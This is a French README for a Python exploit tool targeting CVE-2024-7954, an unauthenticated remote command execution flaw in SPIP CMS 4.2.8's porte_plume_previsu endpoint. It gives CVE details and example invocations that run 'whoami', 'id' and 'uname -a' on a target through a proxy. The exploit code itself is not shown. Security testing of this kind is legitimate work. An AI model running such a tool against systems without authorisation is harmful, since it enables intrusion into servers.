
Exploit d'exécution de commande à distance non authentifié pour SPIP CMS 4.2.8 (CVE-2024-7954) avec support proxy et récupération des résultats en direct.
Ce script exploite une vulnérabilité d'exécution de code à distance dans SPIP version 4.2.8 via le point de terminaison porte_plume_previsu. La vulnérabilité permet à des attaquants non authentifiés d'injecter du code PHP via le rendu de prévisualisation de balises image malveillantes.
ID CVE : CVE-2024-7954
Composant : SPIP CMS (porte_plume_previsu)
Impact : Exécution de commandes à distance non authentifiée
Sévérité : Critique
python3 cve_2024_7954_rce.py --url <URL_CIBLE> --cmd <COMMANDE> [--proxy <IP:PORT>]
python3 cve_2024_7954_rce.py --url <URL_CIBLE> --cmd "whoami" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <URL_CIBLE> --cmd "id" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <URL_CIBLE> --cmd "uname -a" --proxy "127.0.0.1:8080"


Cet outil d'exploitation est destiné uniquement aux tests de sécurité autorisés, à la recherche défensive et à des fins éducatives.